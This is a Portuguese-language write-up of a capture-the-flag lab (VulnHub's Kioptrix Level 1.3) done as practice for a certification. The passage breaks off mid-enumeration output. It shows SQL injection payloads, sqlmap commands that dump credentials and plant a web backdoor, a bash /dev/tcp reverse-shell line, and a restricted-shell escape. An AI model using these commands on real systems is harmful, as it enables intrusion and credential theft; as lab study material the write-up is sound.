Essa é a box 4/5 do volume Kioptrix que faz parte da serie de posts de writeups de box’s que eu estou resolvendo para praticar para a OSCP. Esse level teve alguns desafios interessantes como o emprego exaustivo de SQLMap, conexão SSH legitima, Bypass de shell restrita e bastante enumeração.
So lets roll!
Machine Name: Kioptrix: Level 1.3 (#4)
Resource:https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
Reconhecimento.
Essa etapa contou basicamente com o emprego do nmap onde foi possível enumerar os serviços que estavam operando no alvo.
As flags do nmap utilizadas foram -sS(Scan Stealth) -sV(Tenta enumerar a versão do serviços) -sC(Executa scripts NSE defaults) –mtu(Divide o pacote em tamanhos de 152 bytes) -oA(Salva o output do nmap nos formatos texto, xml e grepable).
nmap -sS -sV -sC --mtu 152 -oA nmap_scan 172.16.0.100
Nmap scan report for 172.16.0.100
Host is up (0.0040s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:EE:A1:97 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -3h00m53s, deviation: 0s, median: -3h00m53s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2019-11-30T12:33:55-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 30 18:34:54 2019 -- 1 IP address (1 host up) scanned in 242.78 seconds
Os serviços identificados foram SSH(22/TCP), HTTP(80/TCP) e serviços do Samba nas portas 139/TCP e 445/TCP.
Foi necessário descobrir qual era o sistema operacional que rodava no alvo para validar se não se tratava de um falso positivo, para isso foi empregado o nmap com a flag -O.
$ sudo nmap -O --mtu 152 -oA nmap_scan_OS_DISCOVERY 172.16.0.100
Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-30 18:35 -02
Stats: 0:02:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 74.17% done; ETC: 18:38 (0:00:42 remaining)
Nmap scan report for 172.16.0.100
Host is up (0.0033s latency).
Not shown: 566 closed ports, 431 filtered ports
PORT STATE SERVICE
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:EE:A1:97 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 181.03 seconds
Contudo não foi possível enumerar o sistema operacional do alvo.
SMB
Uma analise foi realizada no serviço SMB, empregando o programa smbclient, para identificar os shares existentes e se possível obter acesso à informações que ajudassem a comprometer o alvo.
$ smbclient -L //172.16.0.100/ -U GUEST -W localdomain
WARNING: The "syslog" option is deprecated
Enter LOCALDOMAIN\GUEST's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP KIOPTRIX4
Não foram constatados nenhum share exposto no SMB.
Também foi verificado se o alvo possuia falhas conhecidas no SMB, para isso foi adotado o nmap com o apoio dos scripts NSE.
$ sudo nmap --mtu 152 -p 445 --script smb-vuln* -oA nmap_smb_vuln 172.16.0.100
Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-30 18:38 -02
Nmap scan report for 172.16.0.100
Host is up (0.0092s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:EE:A1:97 (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
Nmap done: 1 IP address (1 host up) scanned in 6.54 seconds
Uma Falha no SMB foi identificada, contudo é uma falha que impacta na disponibilidade do serviço se tratando de um ataque de negação de serviço. Uma vez que não faz sentido utilizar uma técnica dessas nesse cenário, foi desconsiderado.
HTTP
Com a superficie de ataque nos outros serviços como SMB estavam muito restritas, foi iniciada a enumeração do serviço web, para essa tarefa foi empregada a ferramenta GoBuster.
sudo docker run -v "/opt/SecLists/Discovery/Web-Content/:/wordlists" -v "pwd:/output" --rm devalias/gobuster -l -e -s 200,204,403 -u 'http://172.16.0.100/' -w /wordlists/big.txt -t 200 -x php,cnf,conf,js,asp,aspx -o /output/gobusterDir -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" -f
Gobuster v1.3 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://172.16.0.100/
[+] Threads : 200
[+] Wordlist : /wordlists/big.txt
[+] Output file : /output/gobusterDir
[+] Status codes : 200,204,403
[+] User Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
[+] Show length : true
[+] Extensions : .php,.cnf,.conf,.js,.asp,.aspx
[+] Add Slash : true
[+] Expanded : true
=====================================================
http://172.16.0.100/.htpasswd/ (Status: 403) [Size: 329]
http://172.16.0.100/.htaccess/ (Status: 403) [Size: 329]
http://172.16.0.100/.htpasswd.php (Status: 403) [Size: 332]
http://172.16.0.100/.htaccess.php (Status: 403) [Size: 332]
http://172.16.0.100/.htpasswd.cnf (Status: 403) [Size: 332]
http://172.16.0.100/.htaccess.cnf (Status: 403) [Size: 332]
http://172.16.0.100/.htpasswd.conf (Status: 403) [Size: 333]
http://172.16.0.100/.htaccess.conf (Status: 403) [Size: 333]
http://172.16.0.100/.htaccess.js (Status: 403) [Size: 331]
http://172.16.0.100/.htpasswd.js (Status: 403) [Size: 331]
http://172.16.0.100/.htaccess.asp (Status: 403) [Size: 332]
http://172.16.0.100/.htpasswd.asp (Status: 403) [Size: 332]
http://172.16.0.100/.htaccess.aspx (Status: 403) [Size: 333]
http://172.16.0.100/.htpasswd.aspx (Status: 403) [Size: 333]
http://172.16.0.100/cgi-bin/ (Status: 403) [Size: 327]
http://172.16.0.100/cgi-bin// (Status: 403) [Size: 328]
http://172.16.0.100/doc/ (Status: 403) [Size: 323]
http://172.16.0.100/icons/ (Status: 200) [Size: 69404]
http://172.16.0.100/images/ (Status: 200) [Size: 931]
http://172.16.0.100/index/ (Status: 200) [Size: 1255]
http://172.16.0.100/index.php (Status: 200) [Size: 1255]
http://172.16.0.100/john/ (Status: 200) [Size: 912]
http://172.16.0.100/robert/ (Status: 200) [Size: 920]
http://172.16.0.100/server-status/ (Status: 403) [Size: 333]
=====================================================
O resultado da enumeração de diretórios identificou que existem diretórios de usuários expostos na raiz, sendo eles John e Robert.
http://172.16.0.100/john/ (Status: 200) [Size: 912]
http://172.16.0.100/robert/ (Status: 200) [Size: 920]
O acesso à robert e john directory resultam em uma resposta estranha da aplicação.
Testes de SQLi em http://172.16.0.100/index.php indicam que a aplicação é vulnerável, uma vez que caso seja informado um usuário válido, dá um erro na senha mostrando o traceback. O payload consiste em setar um usuário no sistema e injetar SQL no campo de password do formulário.
Payload: Username John and password = ' or 2=2# -> Login válido porém dá um crash
Para automatizar a verificação da falha de SQL Injection foi empregado a ferramenta SQLMap. SQLMap é uma ferramenta que consegue lidar com diferentes cenários de injeção de SQL e verificações e possui diversas features para dar apoio em um ataque de SQL Injection.
python sqlmap.py --url http://172.16.0.100/checklogin.php --data "myusername=john&mypassword=abc&Submit=Login" -p myusername,mypassword --random-agent --tamper=space2comment --batch
O SQLMap confirmou que o parâmetro mypassword está vulnerável à SQL Injection, podendo ser o principal vetor de ataque para comprometer essa box.
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
Posteriormente foi possível realizar a enumeração de bancos de dados na instância do MYSQL.
python sqlmap.py --url http://172.16.0.100/checklogin.php --data "myusername=john&mypassword=abc&Submit=Login" -p mypassword --random-agent --dbs --batch --threads=10
available databases [3]:
[*] information_schema
[*] members
[*] mysql
Com o nome do banco de dados members foi possível enumerar as tabelas do banco.
python sqlmap.py --url http://172.16.0.100/checklogin.php --data "myusername=john&mypassword=abc&Submit=Login" -p mypassword --random-agent --batch --threads=10 -D members --tables
Database: members
[1 table]
+---------+
| members |
+---------+
Com o nome da tabela members do banco de dados members foi possível enumerar as colunas da tabela.
python sqlmap.py --url http://172.16.0.100/checklogin.php --data "myusername=john&mypassword=abc&Submit=Login" -p mypassword --random-agent --batch --threads=10 -D members -T members
Database: members
Table: members
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(4) |
| password | varchar(65) |
| username | varchar(65) |
+----------+-------------+
Com a definição das tabelas, foi possível dumpar o banco de dados, dois registros foram encontrados referentes aos usuários John e Robert.
python sqlmap.py --url http://172.16.0.100/checklogin.php --data "myusername=john&mypassword=abc&Submit=Login" -p mypassword --random-agent --batch --threads=10 -D members -T members --dump
Database: members
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password | username |
+----+-----------------------+----------+
| 1 | MyNameIsJohn | john |
| 2 | ADGAdsafdfwt4gadfga== | robert |
+----+-----------------------+----------+
Credencial do John encontra-se em texto claro e a do robert em base64.
Posteriormente ao dump do banco de dados, foi verificado se era possível obter acesso a shell do sistema operacional através do banco de dados, testes obtiveram exito, permitindo ao invasor obter acesso ao sistema operacional através de um SQL Injection.
python sqlmap.py --url http://172.16.0.100/checklogin.php --data "myusername=john&mypassword=abc&Submit=Login" -p mypassword --random-agent --batch --threads=10 --os-shell
___
__H__
___ ___[']_____ ___ ___ {1.3.11.117#dev}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:56:15 /2019-11-30/
[18:56:16] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) chromeframe/10.0.648.205' from file '/opt/sqlmap/data/txt/user-agents.txt'
[18:56:16] [INFO] resuming back-end DBMS 'mysql'
[18:56:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: myusername=john&mypassword=-5094' OR 7832=7832#&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)
Payload: myusername=john&mypassword=abc' OR SLEEP(5)#&Submit=Login
---
[18:56:16] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[18:56:16] [INFO] going to use a web backdoor for command prompt
[18:56:16] [INFO] fingerprinting the back-end DBMS operating system
[18:56:16] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[18:56:16] [INFO] retrieved the web server document root: '/var/www'
[18:56:16] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php'
[18:56:16] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[18:56:16] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://172.16.0.100:80/tmpurgaq.php
[18:56:16] [WARNING] unable to upload the file through the web file stager to '/var/www/'
[18:56:16] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] Y
[18:56:16] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://172.16.0.100:80/tmpbymrg.php
[18:56:16] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> dir
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output:
---
checklogin.php index.php logout.php tmpbymrg.php
database.sql john member.php tmpurgaq.php
images login_success.php robert
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
O usuário que owner do processo é o www-data(33), tendo isso em mente, tentativas de obter uma conexão reversa foram efetuadas visando uma melhor usabilidade do sistema comprometido. Na máquina do atacante, a porta 80 foi colocada em LISTEN, aguardando conexão do host comprometido.
$ ifconfig wlp6s0 ; sudo nc -tlvvp 80
wlp6s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.16.0.24 netmask 255.255.255.0 broadcast 172.16.0.255
inet6 fe80::cb4e:c8b6:2d47:b8ac prefixlen 64 scopeid 0x20<link>
ether 28:56:5a:ff:4d:3f txqueuelen 1000 (Ethernet)
RX packets 2956240 bytes 792588715 (792.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4164081 bytes 523976557 (523.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Listening on [0.0.0.0] (family 0, port 80)
No host comprometido, as tentativas de fechar conexão reversa falharam.
Reverse Shell FAIL:
os-shell> bash -i >& /dev/tcp/172.16.0.24/80 0>&1
Reverse Shell FAIL:
os-shell> echo “” > webshell.php
Uma tentativa de identificar a razão pelo qual não foi possível estabelecer uma conexão reversa, identificou que o usuário www-data(33) possui limitações de escrita e outras restrições.
os-shell> touch a
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output: 'touch: cannot touch `a': Permission denied'
Root directory, no permissions to write
os-shell> ls -ld
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output: 'drwxr-xr-x 5 root root 4096 Nov 30 12:55 .'
Para contornar a shell limitada do SQLMap, foi constatado que é a credencial do usuário John encontrada no banco de dados é válida para acesso SSH.
operador@remember:/opt/sqlmap$ ssh john@172.16.0.100
The authenticity of host '172.16.0.100 (172.16.0.100)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '172.16.0.100' (RSA) to the list of known hosts.
john@172.16.0.100's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ id
*** unknown command: id
john:~$ echo $SHELL
*** forbidden path -> "/bin/kshell"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.
Assim que a conexão do SSH é estabelecida, é idedntificado que existe uma restrição de shell, conhecida como kShell, medidas para contornar essa restrição foram tomadas.
Restricted Shell Bypass
Depois de dar uma lida em alguns papers sobre como funcionam e como realizar o bypass, alguns testes foram executados contra o alvo visando o fazer o jailbreak da shell restrita.
Aqui foram tentadas diversas coisas, seguindo o guia, como por exemplo executar comando direto no SSH, tentar escapar os caracteres que a shell bloqueia porém sem sucesso.
Comandos Disponíveis:
john:~$ help
cd clear echo exit help ll lpath ls
john:~$ echo $SHELL
*** forbidden path -> "/bin/kshell"
operador@remember:/opt/sqlmap$ ssh john@172.16.0.100 -t '/bin/bash'
john@172.16.0.100's password:
*** forbidden shell escape: "/bin/bash"
This incident has been reported.
$ ssh john@172.16.0.100 -t '/bin/sh'
john@172.16.0.100's password:
*** forbidden shell escape: "/bin/sh"
This incident has been reported.
Connection to 172.16.0.100 closed.
john:~$ ls -l \/
total 76
drwxr-xr-x 2 root root 4096 Feb 4 2012 bin
drwxr-xr-x 3 root root 4096 Feb 4 2012 boot
lrwxrwxrwx 1 root root 11 Feb 4 2012 cdrom -> media/cdrom
drwxr-xr-x 12 root root 13660 Nov 30 12:25 dev
drwxr-xr-x 67 root root 4096 Nov 30 12:25 etc
drwxr-xr-x 5 root root 4096 Feb 4 2012 home
drwxr-xr-x 2 root root 4096 Feb 4 2012 initrd
lrwxrwxrwx 1 root root 32 Feb 4 2012 initrd.img -> boot/initrd.img-2.6.24-24-server
drwxr-xr-x 13 root root 4096 Feb 4 2012 lib
drwx------ 2 root root 16384 Feb 4 2012 lost+found
drwxr-xr-x 4 root root 4096 Feb 4 2012 media
drwxr-xr-x 2 root root 4096 Jun 29 2009 mnt
drwxr-xr-x 2 root root 4096 Feb 4 2012 opt
dr-xr-xr-x 107 root root 0 Nov 30 12:25 proc
drwxr-xr-x 4 root root 4096 Feb 6 2012 root
drwxr-xr-x 2 root root 4096 Feb 4 2012 sbin
drwxr-xr-x 2 root root 4096 Feb 4 2012 srv
drwxr-xr-x 12 root root 0 Nov 30 12:25 sys
drwxrwxrwt 3 root root 4096 Nov 30 12:55 tmp
drwxr-xr-x 10 root root 4096 Feb 4 2012 usr
drwxr-xr-x 14 root root 4096 Feb 4 2012 var
lrwxrwxrwx 1 root root 29 Feb 4 2012 vmlinuz -> boot/vmlinuz-2.6.24-24-server
Algum progresso foi realizado usando caracteres de escape porém não foi bom o suficiente para conseguir um bypass. Em outros papers notei que existe um comportamento da shell onde é possível que eu abra uma shell utilizando python com o módulo OS.
echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@Kioptrix4:~$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
Assim temos nosso Bypass na shell restritiva.
Pós Exploitation
Para realizar o processo de Privilege Escalation foi complicado devido à diversas restrições de conexão da box, não estava acessando a rede interna nem externa, passava alguns pacotes de ICMP apenas.
O utilitário Linux Enumeration (LinEnum) foi adotado para automatizar o processo de reconhecimento do sistema alvo.
$ ./linenum.sh
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.93
[-] Debug Info
[+] Thorough tests = Disabled (SUID/GUID checks will not be perfomed!)
Scan started at:
Sat Nov 30 14:08:10 EST 2019
### SYSTEM ##############################################
[-] Kernel information:
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
[-] Kernel information (continued):
Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009
[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
[-] Hostname:
Kioptrix4
### USER/GROUP ##########################################
[-] Current user/group info:
uid=1001(john) gid=1001(john) groups=1001(john)
[-] Users that have previously logged onto the system:
Username Port From Latest
loneferret tty1 Mon Feb 6 20:05:44 -0500 2012
john pts/0 172.16.0.24 Sat Nov 30 13:29:15 -0500 2019
[-] Who else is logged on:
14:08:10 up 1:43, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
john pts/0 172.16.0.24 13:29 3.00s 0.62s 0.00s /bin/bash ./linen
[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(dhcp) gid=102(dhcp) groups=102(dhcp)
uid=102(syslog) gid=103(syslog) groups=103(syslog)
uid=103(klog) gid=104(klog) groups=104(klog)
uid=104(mysql) gid=108(mysql) groups=108(mysql)
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(loneferret) gid=1000(loneferret) groups=1000(loneferret),4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),112(sambashare),114(lpadmin),115(admin)
uid=1001(john) gid=1001(john) groups=1001(john)
uid=1002(robert) gid=1002(robert) groups=1002(robert)
[-] It looks like we have some admin users:
uid=1000(loneferret) gid=1000(loneferret) groups=1000(loneferret),4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),112(sambashare),114(lpadmin),115(admin)
[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
[-] Super user account(s):
root
[+] We can sudo without supplying a password!
usage: sudo -h | -K | -k | -L | -l | -V | -v
usage: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value]
{-i | -s | <command>}
usage: sudo -e [-S] [-p prompt] [-u username|#uid] file ...
[-] Accounts that have recently used sudo:
/home/loneferret/.sudo_as_admin_successful
[+] We can read root's home directory!
total 44K
drwxr-xr-x 4 root root 4.0K Feb 6 2012 .
drwxr-xr-x 21 root root 4.0K Feb 6 2012 ..
-rw------- 1 root root 59 Feb 6 2012 .bash_history
-rw-r--r-- 1 root root 2.2K Oct 20 2007 .bashrc
-rw-r--r-- 1 root root 1 Feb 5 2012 .lhistory
-rw------- 1 root root 1 Feb 5 2012 .mysql_history
-rw------- 1 root root 5 Feb 6 2012 .nano_history
-rw-r--r-- 1 root root 141 Oct 20 2007 .profile
drwx------ 2 root root 4.0K Feb 6 2012 .ssh
-rw-r--r-- 1 root root 625 Feb 6 2012 congrats.txt
drwxr-xr-x 8 loneferret loneferret 4.0K Feb 4 2012 lshell-0.9.12
[-] Are permissions on /home directories lax:
total 20K
drwxr-xr-x 5 root root 4.0K Feb 4 2012 .
drwxr-xr-x 21 root root 4.0K Feb 6 2012 ..
drwxr-xr-x 2 john john 4.0K Nov 30 14:07 john
drwxr-xr-x 2 loneferret loneferret 4.0K Feb 6 2012 loneferret
drwxr-xr-x 2 robert robert 4.0K Feb 4 2012 robert
[-] Root is allowed to login via SSH:
PermitRootLogin yes
### ENVIRONMENTAL #######################################
[-] Environment information:
LC_PAPER=pt_BR.UTF-8
LC_ADDRESS=pt_BR.UTF-8
LC_MONETARY=pt_BR.UTF-8
SHELL=/bin/kshell
TERM=xterm
SSH_CLIENT=172.16.0.24 46824 22
LC_NUMERIC=pt_BR.UTF-8
SSH_TTY=/dev/pts/0
USER=john
LC_TELEPHONE=pt_BR.UTF-8
COLUMNS=82
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
MAIL=/var/mail/john
LC_IDENTIFICATION=pt_BR.UTF-8
PWD=/home/john
LANG=en_US.UTF-8
LC_MEASUREMENT=pt_BR.UTF-8
LINES=39
HISTCONTROL=ignoreboth
HOME=/home/john
SHLVL=3
LOGNAME=john
SSH_CONNECTION=172.16.0.24 46824 172.16.0.100 22
LESSOPEN=| /usr/bin/lesspipe %s
VIMRUNTIME=/usr/share/vim/vim71
VIM=/usr/share/vim
LESSCLOSE=/usr/bin/lesspipe %s %s
LC_NAME=pt_BR.UTF-8
_=/usr/bin/env
[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
[-] Available shells:
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
[-] Current umask value:
u=rwx,g=rx,o=rx
0022
[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root 724 May 12 2009 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 13:22 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
-rw-r--r-- 1 root root 492 Apr 17 2009 php5
/etc/cron.daily:
total 56
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 13:22 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
-rwxr-xr-x 1 root root 633 Jun 18 2009 apache2
-rwxr-xr-x 1 root root 8101 Apr 17 2009 apt
-rwxr-xr-x 1 root root 314 Apr 4 2008 aptitude
-rwxr-xr-x 1 root root 502 Dec 12 2007 bsdmainutils
-rwxr-xr-x 1 root root 89 Oct 9 2008 logrotate
-rwxr-xr-x 1 root root 954 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 183 Mar 8 2008 mlocate
-rwxr-xr-x 1 root root 383 Mar 9 2009 samba
-rwxr-xr-x 1 root root 3295 May 12 2009 standard
-rwxr-xr-x 1 root root 1309 Nov 23 2007 sysklogd
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 13:22 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
/etc/cron.monthly:
total 16
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 13:22 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
-rwxr-xr-x 1 root root 129 May 12 2009 standard
/etc/cron.weekly:
total 24
drwxr-xr-x 2 root root 4096 Feb 4 2012 .
drwxr-xr-x 67 root root 4096 Nov 30 13:22 ..
-rw-r--r-- 1 root root 102 May 12 2009 .placeholder
-rwxr-xr-x 1 root root 528 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 2522 Jan 28 2008 popularity-contest
-rwxr-xr-x 1 root root 1220 Nov 23 2007 sysklogd
[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
### NETWORKING ##########################################
[-] Network and IP info:
eth1 Link encap:Ethernet HWaddr 00:0c:29:ee:a1:97
